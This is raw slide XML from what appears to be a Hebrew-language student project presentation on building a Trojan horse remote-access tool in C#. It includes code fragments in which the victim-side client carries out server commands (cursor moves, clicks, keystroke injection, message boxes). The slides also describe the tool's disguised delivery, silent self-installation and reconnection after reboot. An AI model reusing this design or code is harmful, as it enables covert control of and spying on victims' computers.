              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[3]) == 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cursor.Position</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new Point(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mouse_event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MOUSEEVENTF_RIGHTDOWN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mouse_event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MOUSEEVENTF_RIGHTUP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    }</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1818160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אלגוריתמים מרכזיים</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40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; 3) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0, 2) == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    string[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('#');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SendKeys.Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    catch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; 4) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0, 4) == "Text"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    string[] mmm = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('#');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MessageBox.Show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(mmm[1], mmm[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>קוד זה מייצג את קבלת ההודעה מהשרת ותגובה לו</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="235998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לימוד עצמי</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כאשר ניגשתי לפרויקט </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>– סביבת</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> העבודה הייתה חדשה ולא מוכרת עבורי. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>את </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>רוב </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>הכלים ליצירת הפרויקט </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>למדתי לבד, מהאינטרנט מספרים </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ובאופנים נוספים. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2835797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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>תיאור נושא העבודה</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>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92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>סוס טרויאני הוא כל תוכנת מחשב הפועלת בדרך לא חוקית וחודרת לתוך מחשב של אחר בהתחזות לתוכנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>תמימה. הקורבן </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>לא יוכל להבחין בפעילותה או לדעת על קיומה. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="he-IL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>המוצר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>המוגמר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>פועל כתוכנת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ריגול באופן הבא: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>לפורץ יש </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>אפשרות לשלוח לקורבן תוכנה תמימה. לאחר שהקורבן יפעיל את התוכנה היא תתקין את עצמה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>אוטומטית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ותופעל ותתחבר אוטומטית אל הפורץ גם לאחר הדלקת המחשב מחדש או חיבור מחדש אל האינטרנט. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4282162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אתגרים במהלך הפרויקט</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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>נדרשתי לחשוב בצורה יצירתית ויעילה דבר שלא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>קרה בבית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>הספר כי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>התוכניות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>שכותבים שם הרבה יותר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>פשוטות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לעומת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>זאת בפרויקט זה הייתי צריך לחשוב על יעילות כי אם יהיו הרבה דברים לא יעילים התוכנה תרוץ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לאט. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בנוסף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>לכך צריך לתת לכל המשתנים ולמחלקות שמות משמעותיים כדי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>שיהיה לי יותר קל להתמצא בקודים בהמשך. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2052609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ביבליוגרפיה</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32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" b="1" u="sng" dirty="0"/>
              <a:t>ספרים:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>עיטם מדעי המחשב. (2011). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t># על כוס קפה. עיטם מדעי המחשב. ללמידת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>windows form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>  ו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> בכללי</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>הספר </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>David, B.M., Michael J.D.&amp; Kenneth L.C. (2004). TCP/IP SOCKETS IN C#. San Francisco, CA: Elsevier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" b="1" u="sng" dirty="0"/>
              <a:t>אתרים:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/en-us/library/aa187917.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>אתר רשמי של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> שמספק הסברים ודוגמאות על כל הפונקציות הנמצאות תחת ההרחבה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.NET Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.codeproject.com/KB/cs/globalhook.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>אתר זה מסביר על יצירת הקרסים שתוארו בעבודתי. מסביר על השימוש שלהם ואופן העבודה איתם ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ומספק קבציי מקור לדוגמא</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>ללימוד חיבורים בין רשתות ושליחת נתונים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/en-us/library/aa187917.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>אתר רשמי של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> שמספק הסברים ודוגמאות על כל הפונקציות הנמצאות תחת ההרחבה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.NET Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.codeproject.com/KB/cs/globalhook.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>אתר זה מסביר על יצירת הקרסים שתוארו בעבודתי. מסביר על השימוש שלהם ואופן העבודה איתם ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ומספק קבציי מקור לדוגמא.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.corner.co.il/index.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.esnips.com/web/CSharpSamples</a:t>
